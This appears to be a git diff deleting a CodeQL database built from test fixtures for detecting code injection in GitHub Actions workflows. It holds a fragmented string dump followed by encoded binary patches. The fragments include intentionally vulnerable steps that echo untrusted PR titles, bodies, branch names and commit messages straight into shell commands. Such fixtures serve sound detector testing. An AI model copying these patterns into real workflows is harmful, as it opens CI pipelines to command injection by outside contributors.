sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... 
env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} -| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" -- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... 
bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... 
age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" -id: flow no-flowecho "${{steps.summary.outputs.foo}}" -id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" -id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... 
utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file 
diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info deleted file mode 100644 index 9b4ec24220f77cd70a002420d93e390bfc4c1f7a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 
diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 
diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U 
zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N 
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo deleted file mode 100644 index df3045a1ff5f4f01ad1cca4e97dbff096c69683a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ 
diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel deleted file mode 100644 index fde1ac19d2b083530bcab4cb4fd2dcaa285234ab..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? 
diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 deleted file mode 100644 index cb4291b6b3b65463c7b9660f099668c0cfc4fe35..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16384 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 